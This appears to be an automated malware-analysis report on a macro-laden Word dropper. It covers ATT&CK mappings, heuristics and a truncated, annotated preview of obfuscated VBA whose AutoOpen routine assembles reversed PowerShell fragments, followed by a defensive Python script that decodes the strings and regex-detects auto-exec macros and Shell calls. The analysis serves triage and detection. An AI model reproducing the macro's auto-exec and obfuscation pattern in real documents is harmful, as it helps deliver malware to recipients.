Verdict: MALICIOUS
Risk score: 202
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The file contains VBA macros, including an AutoOpen macro, and a critical heuristic fired for a Shell() call, which indicates the macro is designed to execute arbitrary code. The ClamAV detection name 'Doc.Dropper.Agent-6546695-0' suggests it acts as a dropper for further malicious payloads. Macros plus dropper behaviour strongly suggest a spearphishing-attachment delivery vector. Two triage caveats: the extracted macro source (macros.bas, below) is padded with dead arithmetic and routes its string literals through a helper (jXGSVA) whose offset arguments are constant-folded expressions such as `28133 + 5 - 28133`; read backwards, those literals contain PowerShell fragments (`[ChAR]108`, `.RepL'+'ACE(`, `env:public`), so the stage-2 command is most likely a PowerShell one-liner assembled at run time, and the full macros.bas rather than the preview should be examined to confirm the Shell() target. The single embedded URL, http://schemas.openxmlformats.org/drawingml/2006/main, is the OOXML DrawingML namespace and not a network indicator. The legacy WordBasic heuristic's boilerplate ("no modern VBA project was recovered") is contradicted by the olevba extraction and should be weighted accordingly.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6546695-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6546695-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 157913 bytes | aeb2dfcf70501ef9fe1d34af26e24c80c8d23d31c9599c1ba4b4de8a45eccd7e |
Preview script: first 1,000 lines of the extracted script (lines marked `' [editor note]` are annotations added here, not part of the artifact)

```vb
Attribute VB_Name = "DiniQDKPsfVn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' [editor note] The Sub/Function bodies below are dead arithmetic on undeclared
' variables (junk padding); with On Error Resume Next the runtime errors are swallowed.
Sub rXUYKn(WPzRhk)
BKAAPi = iukLS
JITlkV = (qOYJc / KJQVpm / 32988 / Fix(KLiwC)) + 42613 - CLng(NcjMr + CLng(75)) + OvNhL + 33513 * nmqXkU - CStr(29527) / ZvZBc / CLng(wlnizJ)
End Sub
Sub lozlfr(UHIazN)
ZsaRC = zConpX
RKawL = (UBztm / cUsSn / 96681 / Fix(PbXsM)) + 32344 - CLng(OdjAJv + CLng(15259)) + dJhJP + 83743 * VbznMa - CStr(50953) / kApnH / CLng(tSNhOt)
SwjqzD = jldjKW
wtYEX = (XwzUIA / jrTbAz / 3655 / Fix(iPzOW)) + 68287 - CLng(zXFck + CLng(73365)) + YodrGT + 37588 * OiwXHr - CStr(34081) / iMUCR / CLng(bpBEzz)
OfPumT = wJrijh
ORwcj = (VXQPjj / NnqBUT / 39397 / Fix(DhdUXn)) + 5811 - CLng(VmTjc + CLng(24382)) + CbTSH + 83571 * AKGZR - CStr(20587) / pNPNB / CLng(kVHIu)
End Sub
Sub wucPw(AQnZB)
NInhS = wVsFf
DWbAm = (UKXotU / uJIQu / 60825 / Fix(MNztX)) + 7296 - CLng(tKYas + CLng(28981)) + MZpzd + 13104 * qiYPT - CStr(18596) / EpFwZ / CLng(MpWid)
ibzzOA = TijSQ
YKWja = (EuioVS / SzrWDH / 43320 / Fix(ciqiKO)) + 26852 - CLng(oUWohB + CLng(11188)) + GvEYoA + 74208 * jmhGcM - CStr(63175) / uVwff / CLng(QPqEp)
End Sub
' [editor note] Auto-exec entry point: Autoopen builds a string from the return of
' sfIuEVmJaPSBJ and hands it to SPjlZdJjzPN (defined outside this preview).
Sub Autoopen()
On Error Resume Next
wiuRt = QHCzG
rMwYhH = (cnLuM / aLBfp / 65995 / Fix(KSjCrP)) + 24874 - CLng(wZJwOU + CLng(76232)) + Grhiq + 25711 * nkhNTp - CStr(28832) / MPVRZf / CLng(jRumfO)
SPjlZdJjzPN (zzkms + sfIuEVmJaPSBJ + oHzuzm)
SKCtlh = whtCOn
KQoDh = (lmjdj / UnFPbU / 74765 / Fix(iWOABz)) + 30346 - CLng(QEhYF + CLng(67999)) + rLrPUI + 60783 * ZNnMLr - CStr(33133) / ibAjo / CLng(nBkCf)
End Sub
Sub fvIsl(OEkFS)
wwpnOk = Nznzw
CooYp = (RcJvdF / bBdMhc / 17094 / Fix(isNzn)) + 98242 - CLng(RWrwLn + CLng(66953)) + ZfuaA + 3208 * ALiTJD - CStr(70607) / FWnhUw / CLng(YCjUKn)
jtHsj = jmCIV
rBQUpu = (kmaXGO / zGsuj / 83155 / Fix(zioLR)) + 44032 - CLng(FTTfMb + CLng(9251)) + HhqZdD + 33159 * WAiHH - CStr(50158) / IbdruW / CLng(IYXAiS)
runTW = LDGOwj
SLmPZ = (ZLDijK / fZSBc / 47330 / Fix(ziGqnk)) + 52236 - CLng(FVPtNw + CLng(17982)) + lIbztv + 77039 * EJTTl - CStr(71802) / lZhYo / CLng(vbpEq)
End Sub
Sub iSpwE(bjtBZ)
Equmi = IwTQi
faUsp = (luCoFt / MOwKE / 21697 / Fix(AcUwKJ)) + 94245 - CLng(wumSn + CLng(41073)) + iBjqM + 29711 * CPkBXS - CStr(4265) / mOEuT / CLng(FWijj)
End Sub
Attribute VB_Name = "wICmFtvju"
Sub OwUVaE(IliWk)
XNtBN = fAJcB
tNwviX = (QLAGZ / cBJZvF / 83446 / Fix(BiYMr)) + 63920 - CLng(PaEVS + CLng(81462)) + rPNGHD + 37646 * XHTDlX - CStr(42742) / NXKRsj / CLng(jmpHB)
End Sub
' [editor note] String-assembly routine: each jXGSVA call takes a literal plus two
' constant-folded offsets (28133 + 5 - 28133 = 5, 28133 + 33 - 28133 = 33). Reversed,
' the literals read as PowerShell fragments ("[ChAR]108", ".RepL'+'ACE((", "env:public").
Function sfIuEVmJaPSBJ()
On Error Resume Next
vkHHvK = MpznuF
Rsovn = (zqzIZn / pdTRw / 35036 / Fix(bWMwp)) + 25776 - CLng(OYaWWn + CLng(54326)) + rwuTI + 71909 * nwiIB - CStr(8138) / Vfqcuf / CLng(frGaQl)
TiNXGd = irZKWA
AqjGwV = (OwazjR / zkrScn / 50796 / Fix(WDLOm)) + 91213 - CLng(sfipu + CLng(19866)) + NmKnB + 8520 * nYaMWh - CStr(13661) / suNPsT / CLng(vjjrFG)
QIhWzdafbD = jXGSVA("Pjs]RAhC[+801]RAhC['+'((ECA'+'LpeR.)LkrQ", 28133 + 5 - 28133, 28133 + 33 - 28133)
UqWSvX = IolVc
ikCPNC = (njciS / kqaEKw / 48375 / Fix(DjpEmk)) + 57809 - CLng(GbtPkw + CLng(21491)) + TdDwGl + 28463 * zOmNhk - CStr(53040) / DqaBN / CLng(bSfDd)
iNVEvk = OdEAzR
AANtE = (kMOWS / OUzZa / 98906 / Fix(WjolvS)) + 14946 - CLng(ArVci + CLng(85873)) + iIsvD + 82868 * Wzzmd - CStr(41310) / PEdBC / CLng(UMOSbw)
LMiISdIWK = jXGSVA("0scOB85fl7+fl7l+Mefl7'+'+fl7lxe.Mel( + B'+'SNb'+'Ex + MelhfDMel + cilbup:vnebfl7'+'+fl7Ex = CDSbfl7+HH", 832 + 3 - 832, 832 + 93 - 832)
kUstn = Dlqhi
FJKomJ = (mpknsb / zrVtaU / 12080 / Fix(cBHFwE)) + 34690 - CLng(YWzEwm + CLng(18185)) + cIlKO + 653 * ASMbMQ - CStr(93946) / KqSjI / CLng(hKlUEL)
waNUj = NRBZr
aFODnh = (zMJVt / jRiaCT / 93243 / Fix(inaqnQ)) + 12045 - CLng(pUuqd + CLng(76030)) + rwDXCi + 80023 * FUfCif - CStr(82657) / FvorRn / CLng(AQDdX)
TwcTtO = jXGSVA("u7un@7ADaU", 32759 + 3 - 32759, 32759 + 1 - 32759)
bDLtjr = zwtIsz
WHNXo = (WovovQ / jDHzA / 35622 / Fix(iQUJwn))
... (truncated)
```
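The following triage script is an added example written for this page; it is not part of the analyzer's output and not code from the sample. It folds the `N + k - N` offset padding, pulls every `jXGSVA("...", start, length)` call out of the macro text, and decodes each literal under the hypothesis that `jXGSVA` behaves like `Mid(StrReverse(s), start, length)`. That hypothesis is an assumption drawn from the visible literals (the function body lies beyond the preview) and must be confirmed against the full macros.bas; the regexes, helper names and the `SAMPLE_VBA` excerpt (lines copied from the preview above into a constructed string) are likewise this example's own.

```python
import ast
import operator
import re

# Constructed excerpt: lines copied from the macros.bas preview on this page, with the
# dead-arithmetic padding dropped. Not the full artifact.
SAMPLE_VBA = r'''
Sub Autoopen()
On Error Resume Next
SPjlZdJjzPN (zzkms + sfIuEVmJaPSBJ + oHzuzm)
End Sub
Function sfIuEVmJaPSBJ()
On Error Resume Next
QIhWzdafbD = jXGSVA("Pjs]RAhC[+801]RAhC['+'((ECA'+'LpeR.)LkrQ", 28133 + 5 - 28133, 28133 + 33 - 28133)
LMiISdIWK = jXGSVA("0scOB85fl7+fl7l+Mefl7'+'+fl7lxe.Mel( + B'+'SNb'+'Ex + MelhfDMel + cilbup:vnebfl7'+'+fl7Ex = CDSbfl7+HH", 832 + 3 - 832, 832 + 93 - 832)
TwcTtO = jXGSVA("u7un@7ADaU", 32759 + 3 - 32759, 32759 + 1 - 32759)
End Function
'''

# Auto-exec procedure names and process-execution APIs worth flagging in any VBA project.
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Sub|Function)\s+(AutoOpen|Auto_Open|AutoExec|AutoClose|Document_Open|Workbook_Open)\b',
    re.I | re.M)
EXEC_API_RE = re.compile(r'\b(Shell|ShellExecute|CreateObject|WScript\.Shell)\b', re.I)

# One assignment per line of the form  var = jXGSVA("literal", expr, expr)
# ("" inside a VBA literal is an escaped quote).
CALL_RE = re.compile(
    r'(\w+)\s*=\s*jXGSVA\("((?:[^"]|"")*)"\s*,\s*([^,]+?)\s*,\s*([^)\n]+?)\)\s*$', re.M)

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def fold_arith(expr: str) -> int:
    """Evaluate integer +/-/* padding such as '28133 + 5 - 28133' without eval()."""
    def ev(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](ev(node.left), ev(node.right))
        raise ValueError(f"unsupported offset expression: {expr!r}")
    return ev(ast.parse(expr.strip(), mode="eval").body)


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(): 1-based start, length characters."""
    return s[start - 1:start - 1 + length]


def decode_literal(literal: str, start: int, length: int) -> str:
    """Hypothesised jXGSVA: reverse the literal, then take Mid(start, length).
    Assumption from the visible literals; verify against the full macro source."""
    return vba_mid(literal.replace('""', '"')[::-1], start, length)


def decode_calls(vba: str) -> list:
    """Return (assigned_var, start, length, decoded_fragment) for each jXGSVA call."""
    out = []
    for var, literal, a1, a2 in CALL_RE.findall(vba):
        start, length = fold_arith(a1), fold_arith(a2)
        out.append((var, start, length, decode_literal(literal, start, length)))
    return out


def find_indicators(vba: str) -> dict:
    """Auto-exec entry points and execution APIs present in the given VBA text."""
    return {
        "autoexec": sorted({m.group(1).lower() for m in AUTOEXEC_RE.finditer(vba)}),
        "exec_api": sorted({m.group(1).lower() for m in EXEC_API_RE.finditer(vba)}),
    }


if __name__ == "__main__":
    print("indicators:", find_indicators(SAMPLE_VBA))
    for var, start, length, frag in decode_calls(SAMPLE_VBA):
        print(f"{var} = Mid(StrReverse(lit), {start}, {length}) -> {frag!r}")
```

On the excerpt, the first call decodes to `).RepL'+'ACE(('+'[ChAR]108+[ChAR]` and the second contains `env:public`, which is what points at a PowerShell stage 2; the Shell() call the heuristic flagged is not in the preview, so `exec_api` comes back empty here and the full macros.bas is needed to see what receives the assembled string.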